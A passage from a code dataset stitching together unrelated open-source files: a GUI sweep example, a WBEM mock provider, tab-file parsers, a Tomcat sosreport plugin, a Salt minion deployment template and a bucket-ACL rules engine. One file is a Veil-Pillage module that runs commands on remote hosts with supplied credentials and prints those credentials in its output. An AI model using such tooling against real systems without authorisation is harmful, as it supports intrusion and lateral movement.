"GU", "HI", "ID", "IL", "IN", "IA", "KS", "KY", "LA", "ME", "MD", "MH",
"MA", "MI", "FM", "MN", "MS", "MO", "MT", "NE", "NV", "NH", "NJ", "NM",
"NY", "NC", "ND", "MP", "OH", "OK", "OR", "PW", "PA", "PR", "RI", "SC",
"SD", "TN", "TX", "UT", "VT", "VA", "VI", "WA", "WV", "WI", "WY",
))
PDef("zip-code",
String(charset="123456789",min=1,max=2), String(charset="0123456789",min=4,max=5),
Opt("-", String(charset="0123456789",min=4,max=5))
)
|
ejetzer/spinmob
|
egg/examples/example_sweeper.py
|
Python
|
gpl-3.0
| 5,048
| 0.008122
|
import numpy as _n
import time as _t
import spinmob.egg as egg
##### GUI DESIGN
# create the main window
w = egg.gui.Window(autosettings_path="example_sweeper_w.cfg")
# add the "go" button
b_sweep = w.place_object(egg.gui.Button("Sweep!", checkable=True)).set_width(50)
b_select = w.place_object(egg.gui.Button("Use Blue Range", checkable=True)).set_width(90)
l_x = w.place_object(egg.gui.Label("x:"), alignment=2)
n_x = w.place_object(egg.gui.NumberBox(int=False))
# move to the second row and add a TreeDictionary for our "settings"
w.new_autorow()
settings = w.place_object(egg.gui.TreeDictionary('example_sweeper.cfg'), column_span=4, alignment=1)
settings.add_parameter('sweep/x_start', -10, type='float')
settings.add_parameter('sweep/x_stop', 10, type='float')
settings.add_parameter('sweep/x_steps', 200, type='float')
# load previous settings if they exist
settings.load()
# add a tabbed interface for the plotting area, spanning the first and second rows
tabs = w.place_object(egg.gui.TabArea(), 10,0, row_span=2, alignment=0)
w.set_column_stretch(10)
# add a tab for some plots
t_raw = tabs.add_tab("Raw Plots")
# add a databox plotter object to the tab
d_sweep = t_raw.place_object(egg.gui.DataboxPlot(autosettings_path="example_sweeper_d_sweep.cfg"), alignment=0)
d_sweep[
|
'x'] = []
d_sweep['mag'] = []
d_sweep['phase'] = []
# add a "region of interest" (ROI) for selecting the sweep range
roi_sweep = egg.pyqtgraph.LinearRegionItem([settings['sweep/x_start'], settings['sweep/x_sto
|
p']])
d_sweep.ROIs = [roi_sweep]
# show the blank plots
d_sweep.plot()
##### MAIN FUNCTIONALITY
# define a function to set some parameter on an external instrument
def set_x(x):
    """
    Pretends to set some instrument to a value "x" somehow.

    This is where your code should go; "x" is the current sweep setpoint
    supplied by acquire_button_clicked().
    """
    # for now just update the gui
    n_x.set_value(x)
# define a function to create fake data.
# This is where you might put code for talking to a piece of equipment
def get_data():
    """
    Currently pretends to talk to an instrument and get back the magnitude
    and phase of the measurement.

    Returns (magnitude, phase_in_degrees) of a fake noisy resonance
    centered at x = 0.
    """
    # pretend we're measuring a noisy resonance at zero
    y = 1.0 / (1.0 + 1j*n_x.get_value()) + _n.random.rand()*0.1
    # and that it takes time to do so
    _t.sleep(0.1)
    # return mag phase (second arg True => phase in degrees)
    return abs(y), _n.angle(y, True)
# define a function to be called whenever the acquire button is pressed
def acquire_button_clicked(*a):
    """Run one sweep from sweep/x_start to sweep/x_stop while the Sweep
    button stays checked.  *a soaks up the button's signal arguments."""
    # don't start another loop if the button is unchecked!
    if not b_sweep.is_checked(): return
    # disable the settings during the sweep
    settings.disable()
    # figure out the sweep range from the graph if we're supposed to
    if b_select.is_checked():
        settings['sweep/x_start'], settings['sweep/x_stop'] = roi_sweep.getRegion()
    # otherwise update the roi_sweep to match the sweep
    else: roi_sweep.setRegion((settings['sweep/x_start'],
                               settings['sweep/x_stop']))
    # clear the data and create new columns
    d_sweep.clear()
    d_sweep['x'] = []
    d_sweep['mag'] = []
    d_sweep['phase'] = []
    # dump the settings to the databox header
    settings.send_to_databox_header(d_sweep)
    # start the loop and keep looping until someone
    # unchecks the acquisition button or we max out the iterations
    # setting iterations = 0 will loop infinitely
    for x in _n.linspace(settings['sweep/x_start'],
                         settings['sweep/x_stop'],
                         settings['sweep/x_steps']):
        # make sure the button is still pressed
        if not b_sweep.is_checked(): break
        # set the current value
        set_x(x)
        # get the data
        m, p = get_data()
        # store the data
        d_sweep.append_data_point([x,m,p])
        # plot the data
        d_sweep.plot()
        # process other window events so the GUI doesn't freeze!
        w.process_events()
    # in case the button is still checked
    b_sweep.set_checked(False)
    # re-enable the settings
    settings.enable()
# connect the button
b_sweep.signal_clicked.connect(acquire_button_clicked)
######### OTHER GUI STUFF
# Define a function to save the settings whenever
# they change and connect the signal
# Persist the TreeDictionary to disk on every change; *a soaks up signal args.
def settings_changed(*a): settings.save()
# connecting is a little different for TreeDictionaries
settings.connect_any_signal_changed(settings_changed)
# overwrite the post_load function so it plots and sets up the settings
def d_sweep_after_load():
    """Sync the settings tree and the sweep ROI after a data file is loaded."""
    # dump the header into the settings
    settings.update(d_sweep)
    # update the roi_sweep region
    roi_sweep.setRegion((settings['sweep/x_start'], settings['sweep/x_stop']))
# actually overwrite the existing function
d_sweep.after_load_file = d_sweep_after_load
# overwrite the existing shutdown / destroy sequence
def shutdown():
    """Replacement close handler: stop any running sweep but keep the window."""
    print "Closing but not destroying..."  # Python 2 print statement (file is Py2)
    b_sweep.set_checked(False)
    return
w.event_close = shutdown
# show the window!
w.show(True)
|
pywbem/pywbemtools
|
tests/unit/pywbemcli/all_types_method_mock_v1old.py
|
Python
|
apache-2.0
| 2,630
| 0
|
"""
Test mock script that installs a test method provider for CIM method
AllTypesMethod() in CIM class PyWBEM_AllTypes, using the old setup approach
with global variables.
Note: This script and its method provider perform checks because their purpose
is to test the provider dispatcher. A real mock script with a real method
provider would not need to perform any of these checks.
"""
import pywbem
import pywbem_mock
assert "CONN" in globals()
assert 'SERVER' in globals()
assert 'VERBOSE' in globals()
global CONN # pylint: disable=global-at-module-level
class CIM_AllTypesMethodProvider(pywbem_mock.MethodProvider):
    """
    User test method provider for class PyWBEM_AllTypes.

    Serves exactly one CIM method, AllTypesMethod(), and echoes the input
    parameters back as output parameters with return value 0.  The checks
    it performs exist only to exercise the provider dispatcher.
    """

    provider_classnames = 'PyWBEM_AllTypes'

    def __init__(self, cimrepository):
        super(CIM_AllTypesMethodProvider, self).__init__(cimrepository)

    def InvokeMethod(self, methodname, localobject, params):
        """
        Validate methodname and target class, then return (0, params).

        The parameters and return for InvokeMethod are defined in
        :meth:`~pywbem_mock.MethodProvider.InvokeMethod`.
        """
        namespace = localobject.namespace
        classname = localobject.classname
        # The dispatcher must only route our single registered class here.
        assert classname.lower() == self.provider_classnames.lower()
        if methodname != 'AllTypesMethod':
            raise pywbem.CIMError(pywbem.CIM_ERR_METHOD_NOT_AVAILABLE)
        # The target class must exist in the repository namespace.
        if not self.class_exists(namespace, classname):
            raise pywbem.CIMError(
                pywbem.CIM_ERR_NOT_FOUND,
                "class {0} does not exist in CIM repository, "
                "namespace {1}".format(classname, namespace))
        # Echo the input parameters back as the output parameters.
        out_params = params
        return_value = 0
        return (return_value, out_params)
# Register the provider to the mock environment
# pylint: disable=undefined-variable
_PROV = CIM_AllTypesMethodProvider(CONN.cimrepository) # noqa: F821
CONN.register_provider(_PROV, CONN.default_namespace, # noqa: F821
verbose=VERBOSE) # noqa: F821
|
Exploit-install/Veil-Pillage
|
modules/enumeration/host/detect_powershell.py
|
Python
|
gpl-3.0
| 2,043
| 0.007832
|
"""
Module to detect a functional Powershell installation on a host or host list.
TODO: implement parts of https://github.com/DiabloHorn/DiabloHorn/blob/master/remote_appinitdlls/rapini.py
for remote registry modifications?
Module built by @harmj0y
"""
from lib import command_methods
class Module:
    """Pillage module that detects a working Powershell install on hosts."""

    def __init__(self, targets=None, creds=None, args=None):
        self.name = "Powershell Detection"
        self.description = "Detects a functional Powershell installation on a host or host list."

        # one or more target hosts
        self.targets = targets

        # list of credential tuples: [(username, pw), (username2, pw2), ...]
        self.creds = creds

        # state output that pillage.py writes out after the run
        self.output = ""

        # user-configurable options - format is {Option : [Value, Description]}
        self.required_options = {"trigger_method" : ["wmis", "[wmis], [winexe], or [smbexec] for triggering"]}

    def run(self):
        # assume a single set of credentials
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:
            # Rather than querying the registry install key, just evaluate a
            # trivial Powershell expression and check the result -- we care
            # whether Powershell is *functional*, not merely installed.
            command = "powershell.exe -c \"$a=42;$a\""
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result.strip() == "42":
                self.output += "[*] Powershell detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                self.output += "[!] Powershell not detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
|
maximilianh/maxtools
|
lib/tabfile.py
|
Python
|
gpl-2.0
| 15,316
| 0.012471
|
import sys
import glob
#import sets
import re
def openSpec(fname, mode="r"):
    """Open *fname* and return a file handle.

    Special names: "stdin" -> sys.stdin, "stdout" -> sys.stdout, and
    "none"/None -> None (no file at all).
    """
    if fname == "stdin":
        return sys.stdin
    if fname == "stdout":
        return sys.stdout
    if fname == "none" or fname is None:
        return None
    return open(fname, mode)
def writeList(fname, list):
    # Write one tab-separated row per element of *list* to *fname*
    # (resolved through openSpec, so "stdout" is accepted).
    # NOTE(review): of.close() is called unconditionally, which would close
    # sys.stdout when fname == "stdout" -- confirm that is intended.
    of = openSpec(fname, "w")
    for row in list:
        row = [str(d) for d in row]
        of.write("\t".join(row))
        of.write("\n")
    of.close()
def slurpdict(fname, comments=False, valField=1, doNotCheckLen=False, asFloat=False, otherFields=False, asInt=False, headers=False, keyAsInt=False, quiet=False):
    """ parse file with key -> value pair on each line, key/value has 1:1 relationship"""
    """ last field: set valField==-1, return as a dictionary key -> value """
    # Flag summary:
    #   comments      - skip lines starting with '#'
    #   valField      - value column index (-1 selects the last column)
    #   doNotCheckLen - keep single-column lines with val=None instead of
    #                   skipping them
    #   otherFields   - value becomes the list of all remaining columns
    #   asFloat/asInt - convert the value (NOTE(review): combined with
    #                   otherFields this would call float()/int() on a list
    #                   and fail -- presumably the flags are mutually
    #                   exclusive; confirm with callers)
    #   headers       - skip the first line
    #   keyAsInt      - convert the key to int
    #   quiet         - suppress stderr diagnostics
    if fname==None or fname=="":
        return {}
    dict = {}
    f = openSpec(fname)
    if not f:
        return dict
    if headers:
        # consume and discard the header line
        headers = f.readline()
    for l in f:
        fs = l.strip().split("\t")
        if comments and l.startswith("#"):
            continue
        if not len(fs)>1:
            if not doNotCheckLen:
                if not quiet:
                    sys.stderr.write("info: not enough fields, ignoring line %s\n" % l)
                continue
            else:
                # single-column line kept deliberately: value is None
                key = fs[0]
                val = None
        else:
            key = fs[0]
            if keyAsInt:
                key = int(key)
            if not otherFields:
                val = fs[valField]
            else:
                val = fs[1:]
            if asFloat:
                val = float(val)
            elif asInt:
                val = int(val)
        # first occurrence wins; later duplicates are reported, not stored
        if key not in dict:
            dict[key] = val
        else:
            if not quiet:
                sys.stderr.write("info: file %s, hit key %s two times: %s -> %s\n" %(fname, key, key, val))
    return dict
def slurpdictlist(fname, reverse=False, filterComments=False, keyType=None, valType=None):
    """Parse a key<TAB>value file into a dict of key -> list of values
    (1:n relationship). reverse=True swaps the two columns;
    keyType/valType are optional conversion callables."""
    if fname is None:
        return {}
    mapping = {}
    handle = sys.stdin if fname == "stdin" else open(fname, "r")
    for line in handle:
        if filterComments and line.startswith("#"):
            continue
        cols = line.strip().split("\t")
        # lines without at least two columns are silently ignored
        if len(cols) <= 1:
            continue
        key, val = (cols[1], cols[0]) if reverse else (cols[0], cols[1])
        if keyType:
            key = keyType(key)
        if valType:
            val = valType(val)
        mapping.setdefault(key, []).append(val)
    return mapping
def slurpdictset(fname, reverse=False, keyType=None, valType=None):
    """Read a two-column tab-separated file into a dict of key -> set of
    values (1:n, duplicates collapsed). reverse=True swaps the columns;
    keyType/valType are optional conversion callables (e.g. int)."""
    if fname is None or fname == "":
        return {}
    result = {}
    fh = sys.stdin if fname == "stdin" else open(fname, "r")
    for line in fh:
        cols = line.strip().split("\t")
        # need at least key + value
        if len(cols) <= 1:
            continue
        key, val = (cols[1], cols[0]) if reverse else (cols[0], cols[1])
        if keyType:
            key = keyType(key)
        if valType:
            val = valType(val)
        result.setdefault(key, set()).add(val)
    return result
def slurplist(fname, check=True, field=None, filterComments=False, valType=None, headers=False):
    """Read a file with one entry per line into a list.

    check=True aborts the program on a duplicate line; field selects a
    whitespace-separated column; headers skips the first line; valType is
    an optional conversion callable. Blank lines are skipped.
    """
    if fname is None:
        return []
    fh = sys.stdin if fname == "stdin" else open(fname, "r")
    entries = []
    if headers:
        fh.readline()
    for raw in fh:
        stripped = raw.strip()
        if filterComments and stripped.startswith("#"):
            continue
        if not stripped:
            continue
        # duplicate detection compares the full stripped line against the
        # already-collected (possibly field-extracted) values
        if check and stripped in entries:
            sys.stderr.write("tabfile.py/slurplist: file=%s, duplicate key = %s, exiting\n" % (fname, stripped))
            sys.exit(1)
        value = stripped if field is None else stripped.split()[field]
        if valType:
            value = valType(value)
        entries.append(value)
    return entries
def slurplistasdict(fname, split=False, default=True):
    """Read one entry per line into a dict (entry -> default) for O(1)
    membership tests. split=True keeps only the first tab column.
    Returns None (after a stderr note) when a duplicate entry is seen."""
    lookup = {}
    for raw in open(fname, "r"):
        entry = raw.strip()
        if split:
            entry = entry.split("\t")[0]
        if entry in lookup:
            sys.stderr.write("tabfile.py: key already in dict!\n")
            return None
        lookup[entry.strip()] = default
    return lookup
def slurpdictlistlist(fname):
    """Parse lines of key<TAB>val1<TAB>val2... into a dict of
    key -> list of value-lists (one value-list per input line).
    '#' comment lines and lines without values are skipped."""
    if fname is None:
        # NB: historical quirk -- returns a list here, a dict otherwise
        return []
    table = {}
    for raw in open(fname, "r"):
        if raw.startswith("#"):
            continue
        cols = raw.strip().split("\t")
        if len(cols) > 1:
            table.setdefault(cols[0], []).append(cols[1:])
    return table
def parseTsv(fname, columnNames=None, asListOfDicts=False):
    """Read selected columns from a headered TSV file (R-dataframe style).

    Returns a (comments, headers, data) tuple. data is a list of lists in
    columnNames order, or a list of dicts when asListOfDicts is True.
    comments is currently always empty (comment-line parsing is disabled).
    Exits the program when a requested column is missing.
    """
    comments = []
    f = openSpec(fname)

    # First line carries the column headers.
    headers = f.readline().strip().split("\t")

    # Default to all columns; otherwise verify every requested column exists.
    if not columnNames:
        columnNames = headers
    for col in columnNames:
        if col not in headers:
            sys.stderr.write("error tabfile.py: columnName %s (out of %s) not found in headers %s\n" % (col, str(columnNames), str(headers)))
            sys.exit(1)

    # header name -> column index
    colIndex = dict(zip(headers, range(len(headers))))

    data = []
    for line in f:
        if line.startswith("#"):
            continue
        fields = line.strip().split("\t")
        if asListOfDicts:
            row = dict((c, fields[colIndex[c]]) for c in columnNames)
        else:
            row = [fields[colIndex[c]] for c in columnNames]
        data.append(row)
    return comments, headers, data
############### PSL FILES ########################
class Psl:
def toList(self, str):
return [int(x) for x in str.split(",") if x.strip()!=""]
def __init__(self, line):
(match, misMatches, repMatches, nCount, qNumInsert, qBaseInsert, tNumInsert, tBaseInsert, strand, qName, qSize, qStart, qEnd, tName, tSize, tStart, tEnd, blockCount, blockSizes, qStarts, tStarts) = line.split("\t")
self.match = int(match)
self.misMatches = int(misMatches)
self.repMatches = int(repMatches)
self.nCount = int(nCount)
self.qNumInsert = int(qNumInsert)
self.qBaseInsert = int(qBaseInsert)
self.tNumInsert = int(tNumInsert)
self.tBaseInsert = int(tBaseInsert)
self.strand = strand
self.qName = qName
self.qSize = int(qSize)
self.qStart = int(qStart)
self.qEnd = int(qEnd)
self.tName = tName
self.tSize = int(tSize)
self.tStart = int(tStart)
self.tEnd = int(tEnd)
self.blockCount = int(blockCount)
self.blockSizes = self.toList(blockSizes)
self.qStarts = self.toList(qStarts)
self.tStarts = self.toList(tStarts)
def getQueryBlocks(self):
regions = []
if self.strand[0]=="+":
|
pierg75/pier-sosreport
|
sos/plugins/tomcat.py
|
Python
|
gpl-2.0
| 2,298
| 0
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from sos.plugins import Plugin, RedHatPlugin
from datetime import datetime
class Tomcat(Plugin, RedHatPlugin):
    """Apache Tomcat server
    """

    plugin_name = 'tomcat'
    profiles = ('webserver', 'java', 'services', 'sysmgmt')
    packages = ('tomcat', 'tomcat6', 'tomcat7', 'tomcat8')

    def setup(self):
        # Configuration directories for every supported Tomcat version.
        self.add_copy_spec([
            "/etc/tomcat",
            "/etc/tomcat6",
            "/etc/tomcat7",
            "/etc/tomcat8"
        ])

        limit = self.get_option("log_size")

        if self.get_option("all_logs"):
            self.add_copy_spec("/var/log/tomcat*/*")
        else:
            # Only catalina.out plus today's dated catalina log.
            self.add_copy_spec("/var/log/tomcat*/catalina.out",
                               sizelimit=limit)

            # Today's date in ISO format: days/months below 10 are
            # zero-padded, matching the catalina.<date>.log naming scheme.
            today = datetime.date(datetime.now()).isoformat()
            self.add_copy_spec("/var/log/tomcat*/catalina.%s.log" % today,
                               sizelimit=limit)

    def postproc(self):
        # Scrub password-bearing attributes from server.xml ...
        serverXmlPasswordAttributes = ['keyPass', 'keystorePass',
                                       'truststorePass', 'SSLPassword']
        for attr in serverXmlPasswordAttributes:
            self.do_path_regex_sub(
                r"\/etc\/tomcat.*\/server.xml",
                r"%s=(\S*)" % attr,
                r'%s="********"' % attr
            )
        # ... and user passwords from tomcat-users.xml.
        self.do_path_regex_sub(
            r"\/etc\/tomcat.*\/tomcat-users.xml",
            r"password=(\S*)",
            r'password="********"'
        )
# vim: set et ts=4 sw=4 :
|
AxisPhilly/py-li
|
li/exceptions.py
|
Python
|
mit
| 302
| 0
|
class LIException(Exception):
    """Base error for the LI client: an ambiguous problem occurred while
    handling the request."""


class DocTypeException(LIException):
    """Raised when the provided document type is invalid."""


class DocIDException(LIException):
    """Raised when the provided document ID is invalid."""
|
aljim/deploymentmanager-samples
|
examples/v2/saltstack/python/minion.py
|
Python
|
apache-2.0
| 3,271
| 0.003057
|
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Creates a set of VMs each running a Salt minion daemon in a Docker container.
"""
# Boot image shared by every minion instance.
IMAGE = ('https://www.googleapis.com/compute/v1/projects/debian-cloud'
         '/global/images/family/debian-9')


def GenerateConfig(context):
    """Generate the final DM configuration: one instance per minion."""
    return {
        'resources': [GenerateInstanceConfig(context, replica)
                      for replica in range(context.properties['minionCount'])]
    }


def GenerateInstanceConfig(context, replica):
    """Generate the configuration for a single minion instance.

    The instance name is <deployment>-<name>-<replica>; the startup script
    installs salt-minion and points it at the configured master.
    """
    deployment = context.env['deployment']
    project = context.env['project']
    zone = context.properties['zone']

    name = deployment + '-' + context.env['name'] + '-' + str(replica)
    machine_type = ('https://www.googleapis.com/compute/v1/projects/'
                    + project + '/zones/' + zone + '/machineTypes/f1-micro')

    # Installs the SaltStack apt repo + salt-minion, rewrites the minion
    # config to point at the configured master, then starts the minion.
    startup_script = ('#! /bin/bash\n'
                      'sudo echo \'deb http://debian.saltstack.com'
                      '/debian jessie-saltstack main\' >> '
                      '/etc/apt/sources.list\n'
                      'sudo wget -q -O- http://debian.saltstack.com/'
                      'debian-salt-team-joehealy.gpg.key | '
                      'sudo apt-key add -\n'
                      'sudo apt-get update\n'
                      'sudo apt-get -y install salt-minion\n'
                      'sudo sed -i \'s/#master: salt/master: ' +
                      context.properties['master'] +
                      '/\' /etc/salt/minion\n'
                      'sudo salt-minion -l debug')

    return {
        'type': 'compute.v1.instance',
        'name': name,
        'properties': {
            'zone': zone,
            'machineType': machine_type,
            'disks': [{
                'deviceName': 'boot',
                'type': 'PERSISTENT',
                'boot': True,
                'autoDelete': True,
                'initializeParams': {
                    'sourceImage': IMAGE
                }
            }],
            'networkInterfaces': [{
                'network': ('https://www.googleapis.com/compute/v1/projects/'
                            + project + '/global/networks/default'),
                'accessConfigs': [{
                    'name': 'External NAT',
                    'type': 'ONE_TO_ONE_NAT'
                }]
            }],
            'tags': {
                'items': ['http-server']
            },
            'metadata': {
                'items': [{
                    'key': 'startup-script',
                    'value': startup_script
                }]
            }
        }
    }
|
agconti/njode
|
env/lib/python2.7/site-packages/floppyforms/gis/widgets.py
|
Python
|
bsd-3-clause
| 5,019
| 0
|
from django.conf import settings
from django.utils import translation, six
try:
from django.contrib.gis import gdal, geos
except ImportError:
"""GDAL / GEOS not installed"""
import floppyforms as forms
__all__ = ('GeometryWidget', 'GeometryCollectionWidget',
'PointWidget', 'MultiPointWidget',
'LineStringWidget', 'MultiLineStringWidget',
'PolygonWidget', 'MultiPolygonWidget',
'BaseGeometryWidget', 'BaseMetacartaWidget',
'BaseOsmWidget', 'BaseGMapWidget')
class BaseGeometryWidget(forms.Textarea):
    """
    The base class for rich geometry widgets. Custom widgets may be
    obtained by subclassing this base widget.
    """
    # Map display options; all overridable per-widget via attrs (see
    # map_attrs below).
    display_wkt = False
    map_width = 600
    map_height = 400
    map_srid = 4326
    template_name = 'floppyforms/gis/openlayers.html'

    # Internal API #
    is_point = False
    is_linestring = False
    is_polygon = False
    is_collection = False
    geom_type = 'GEOMETRY'

    # Names of attributes that may be supplied through the widget's attrs
    # dict and copied onto the instance in __init__.
    map_attrs = ('map_width', 'map_height', 'map_srid', 'display_wkt')

    def __init__(self, *args, **kwargs):
        super(BaseGeometryWidget, self).__init__(*args, **kwargs)
        # Pull map-related overrides out of attrs onto the instance,
        # keeping the class defaults for anything not supplied.
        attrs = kwargs.pop('attrs', {})
        for key in self.map_attrs:
            setattr(self, key, attrs.pop(key, getattr(self, key)))

    def get_context_data(self):
        """Expose geometry-type flags and map options to the template."""
        ctx = super(BaseGeometryWidget, self).get_context_data()
        for key in ('is_polygon', 'is_linestring',
                    'is_point', 'is_collection'):
            ctx[key] = getattr(self, key)
        ctx['geom_type'] = gdal.OGRGeomType(self.geom_type)
        for key in self.map_attrs:
            ctx[key] = getattr(self, key)
        # Template expects the short name for generic collections.
        if self.geom_type == 'GEOMETRYCOLLECTION':
            ctx['geom_type'] = 'Collection'
        return ctx

    def get_context(self, name, value, attrs=None, extra_context={}):
        """Build the render context; value is serialized to WKT."""
        # If a string reaches here (via a validation error on another
        # field) then just reconstruct the Geometry.
        if isinstance(value, six.text_type):
            try:
                value = geos.GEOSGeometry(value)
            except (geos.GEOSException, ValueError):
                value = None
        # Discard geometries of the wrong type, unless this widget accepts
        # any geometry.
        if (
            value and value.geom_type.upper() != self.geom_type and
            self.geom_type != 'GEOMETRY'
        ):
            value = None

        # Defaulting the WKT value to a blank string
        wkt = ''
        if value:
            # Reproject into the map's SRID before serializing to WKT.
            srid = self.map_srid
            if value.srid != srid:
                try:
                    ogr = value.ogr
                    ogr.transform(srid)
                    wkt = ogr.wkt
                except gdal.OGRException:
                    pass  # wkt left as an empty string
            else:
                wkt = value.wkt

        context = super(BaseGeometryWidget, self).get_context(name, wkt, attrs)
        # JS module name derived from the field name.
        context['module'] = 'map_%s' % name.replace('-', '_')
        context['name'] = name
        # Django >= 1.4 doesn't have ADMIN_MEDIA_PREFIX anymore, we must
        # rely on contrib.staticfiles.
        if hasattr(settings, 'ADMIN_MEDIA_PREFIX'):
            context['ADMIN_MEDIA_PREFIX'] = settings.ADMIN_MEDIA_PREFIX
        else:
            context['ADMIN_MEDIA_PREFIX'] = settings.STATIC_URL + 'admin/'
        context['LANGUAGE_BIDI'] = translation.get_language_bidi()
        return context
class GeometryWidget(BaseGeometryWidget):
    """Widget accepting any geometry type (inherits GEOMETRY defaults)."""
    pass


class GeometryCollectionWidget(GeometryWidget):
    """Widget for a collection of arbitrary geometries."""
    is_collection = True
    geom_type = 'GEOMETRYCOLLECTION'


class PointWidget(BaseGeometryWidget):
    """Widget for a single point."""
    is_point = True
    geom_type = 'POINT'


class MultiPointWidget(PointWidget):
    """Widget for a collection of points."""
    is_collection = True
    geom_type = 'MULTIPOINT'


class LineStringWidget(BaseGeometryWidget):
    """Widget for a single line string."""
    is_linestring = True
    geom_type = 'LINESTRING'


class MultiLineStringWidget(LineStringWidget):
    """Widget for a collection of line strings."""
    is_collection = True
    geom_type = 'MULTILINESTRING'


class PolygonWidget(BaseGeometryWidget):
    """Widget for a single polygon."""
    is_polygon = True
    geom_type = 'POLYGON'


class MultiPolygonWidget(PolygonWidget):
    """Widget for a collection of polygons."""
    is_collection = True
    geom_type = 'MULTIPOLYGON'
class BaseMetacartaWidget(BaseGeometryWidget):
    """Base widget loading OpenLayers from the openlayers.org CDN."""

    class Media:
        js = (
            'http://openlayers.org/api/OpenLayers.js',
            'floppyforms/js/MapWidget.js',
        )


class BaseOsmWidget(BaseGeometryWidget):
    """An OpenStreetMap base widget"""
    # 900913 is the legacy spherical-Mercator SRID used by OSM tiles.
    map_srid = 900913
    template_name = 'floppyforms/gis/osm.html'

    class Media:
        js = (
            'http://openlayers.org/api/OpenLayers.js',
            'http://www.openstreetmap.org/openlayers/OpenStreetMap.js',
            'floppyforms/js/MapWidget.js',
        )


class BaseGMapWidget(BaseGeometryWidget):
    """A Google Maps base widget"""
    # 900913 is the legacy spherical-Mercator SRID used by Google Maps.
    map_srid = 900913
    template_name = 'floppyforms/gis/google.html'

    class Media:
        js = (
            'http://openlayers.org/api/OpenLayers.js',
            'floppyforms/js/MapWidget.js',
            'http://maps.google.com/maps/api/js?sensor=false',
        )
|
tastyproject/tasty
|
tasty/tests/functional/protocols/mul/unsignedvec_server_server_client/protocol.py
|
Python
|
gpl-3.0
| 442
| 0.004525
|
# -*- coding: utf-8 -*-
# Protocol parameters: bit lengths of the two operands and the vector size.
__params__ = {'la': 32, 'lb': 32, 'da': 10}


def protocol(client, server, params):
    # Multiply a server-supplied unsigned vector (a) by an unsigned scalar
    # (b) on the client side and hand the product vector (c) back to the
    # test driver. UnsignedVec/Unsigned/driver are provided by the tasty
    # DSL runtime, not imported here.
    la = params['la']
    lb = params['lb']
    da = params["da"]

    # Server obtains both inputs from the driver.
    server.a = UnsignedVec(bitlen=la, dim=da).input(src=driver, desc="a")
    server.b = Unsigned(bitlen=lb).input(src=driver, desc="b")

    # Ship the inputs to the client, compute there, output the result.
    client.a <<= server.a
    client.b <<= server.b
    client.c = client.a * client.b
    client.c.output(dest=driver, desc="c")
|
felixbb/forseti-security
|
google/cloud/security/scanner/audit/buckets_rules_engine.py
|
Python
|
apache-2.0
| 8,802
| 0.000227
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules engine for Bucket acls"""
from collections import namedtuple
import itertools
import re
# pylint: disable=line-too-long
from google.cloud.security.common.gcp_type import bucket_access_controls as bkt_acls
# pylint: enable=line-too-long
from google.cloud.security.common.util import log_util
from google.cloud.security.scanner.audit import base_rules_engine as bre
from google.cloud.security.scanner.audit import errors as audit_errors
LOGGER = log_util.get_logger(__name__)
# TODO: move this to utils since it's used in more that one engine
def escape_and_globify(pattern_string):
    """Turn a glob-style pattern into an anchored regex string.

    All regex metacharacters are escaped, then every "*" becomes ".+"
    (one or more characters) so that a pattern like "*@company.com" does
    not match a zero-length username before the "@".

    Args:
        pattern_string: The glob pattern to convert.

    Returns:
        An anchored regex string of the form '^...$'.
    """
    escaped = re.escape(pattern_string)
    return '^%s$' % escaped.replace('\\*', '.+')
class BucketsRulesEngine(bre.BaseRulesEngine):
    """Rules engine for bucket acls"""

    def __init__(self, rules_file_path):
        """Initialize.

        Args:
            rules_file_path: file location of rules
        """
        super(BucketsRulesEngine, self).__init__(
            rules_file_path=rules_file_path)
        self.rule_book = None

    def build_rule_book(self):
        """Build BucketsRuleBook from the rules definition file."""
        self.rule_book = BucketsRuleBook(self._load_rule_definitions())

    # pylint: disable=arguments-differ
    def find_policy_violations(self, buckets_acls, force_rebuild=False):
        """Determine whether bucket acls violate any rule.

        Returns an iterator (itertools.chain) over all rule violations.
        """
        if self.rule_book is None or force_rebuild:
            self.build_rule_book()

        violations = itertools.chain()
        for rule in self.rule_book.get_resource_rules():
            violations = itertools.chain(
                violations, rule.find_policy_violations(buckets_acls))
        return violations

    def add_rules(self, rules):
        """Add rules to the rule book."""
        if self.rule_book is not None:
            self.rule_book.add_rules(rules)
class BucketsRuleBook(bre.BaseRuleBook):
    """The RuleBook for bucket acls resources."""

    def __init__(self, rule_defs=None):
        """Initialization.

        Args:
            rule_defs: rule definitons
        """
        super(BucketsRuleBook, self).__init__()
        # Maps rule_index -> Rule for every successfully parsed rule.
        self.resource_rules_map = {}
        if not rule_defs:
            self.rule_defs = {}
        else:
            self.rule_defs = rule_defs
            self.add_rules(rule_defs)

    def add_rules(self, rule_defs):
        """Add rules to the rule book"""
        for (i, rule) in enumerate(rule_defs.get('rules', [])):
            self.add_rule(rule, i)

    def add_rule(self, rule_def, rule_index):
        """Add a rule to the rule book.

        Args:
            rule_def: A dictionary containing rule definition properties.
